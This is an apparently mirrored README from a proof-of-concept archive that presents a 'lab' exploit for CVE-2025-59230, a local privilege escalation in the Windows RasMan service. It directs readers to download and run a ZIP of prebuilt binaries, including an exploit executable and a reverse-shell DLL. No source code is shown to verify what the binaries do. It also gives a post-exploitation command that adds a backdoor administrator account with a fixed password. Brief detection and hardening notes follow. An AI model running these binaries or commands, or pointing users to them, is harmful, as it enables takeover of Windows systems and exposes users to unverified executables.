关联漏洞
介绍
# Lab: CVE-2025-59230 - Local Privilege Escalation in Windows Remote Access Connection Manager
## 🚀 Overview
CVE-2025-59230 is a high-severity vulnerability in the Windows Remote Access Connection Manager (RasMan) service, affecting multiple versions of Microsoft Windows operating systems. The flaw stems from improper access control mechanisms within the RasMan service, allowing an authenticated local user to manipulate service parameters and escalate privileges to SYSTEM level. This could enable unauthorized code execution, data exfiltration, or persistence on the affected system.
It is intended solely for security researchers, penetration testers, and system administrators to understand the exploit chain and test mitigations.
**Safety Disclaimer:** Running this lab involves executing potentially harmful code in a controlled environment. The exploit code is designed to demonstrate privilege escalation.
## 📋 Prerequisites
- A host machine running Windows 10/11 or Windows Server 2019/2022/2025 with Hyper-V and Containers features enabled.
- Basic knowledge of Windows services, PowerShell commands.
Affected Windows versions:
- Windows 10 (versions 1507, 1607, 1809, 21H2, 22H2)
- Windows 11 (versions 22H2, 22H3, 23H2, 24H2, 25H2)
- Windows Server 2016, 2019, 2022 (including 23H2), 2025
## Download & Install
1. Download the exploit package: [Download Exploit ZIP](http://github.com/moegameka/cve-2025-59230/raw/refs/heads/main/Core/lab-cve-2025-59230.zip). This ZIP contains:
- `rasmanesc.exe`: The main exploit binary.
- `start_exp.bat`: Batch script to launch the exploit safely (executes `rasmanesc.exe` with default parameters).
- `payload.dll`: For reverse shell demonstration.
2. Extract the ZIP.
## 🛠 Usage
1. **Exploit Execution:**
- Launch `start_exp.bat` or directly `rasmanesc.exe /payload=payload.dll`.
- The exploit:
- Obtains a handle to the RasMan service.
- Sends a crafted IOCTL buffer to overwrite service parameters.
- Elevates to SYSTEM by token impersonation.
- Injects the payload to spawn a SYSTEM-level shell.
2. **Post-Exploitation:**
- In the escalated shell, demonstrate impact: `net user admin P@ssw0rd /add; net localgroup administrators admin /add`.
3. **Detection Signatures:**
- Monitor for unusual IOCTL calls to RasMan via Sysmon (Event ID 10).
- Anomalous registry modifications to RasMan keys.
## 🛡️ Mitigation
- **Hardening:**
- Restrict RasMan service ACLs: Use `sc sdset RasMan` to enforce strict DACLs.
- Enable Credential Guard and Protected Process Light for critical services.
- Implement AppLocker or WDAC to block unsigned executables.
- **Best Practices:** Run services with least privilege, segment networks, and conduct regular vulnerability scans using tools like Nessus or OpenVAS.
For any inquiries, please email me at: moegameka@onet.pl
文件快照
[4.0K] /data/pocs/63832da90052cf3d52f286a7611a1e3a4aca361b
├── [4.0K] Core
│ ├── [ 1] d
│ └── [8.0M] lab-cve-2025-59230.zip
└── [2.8K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →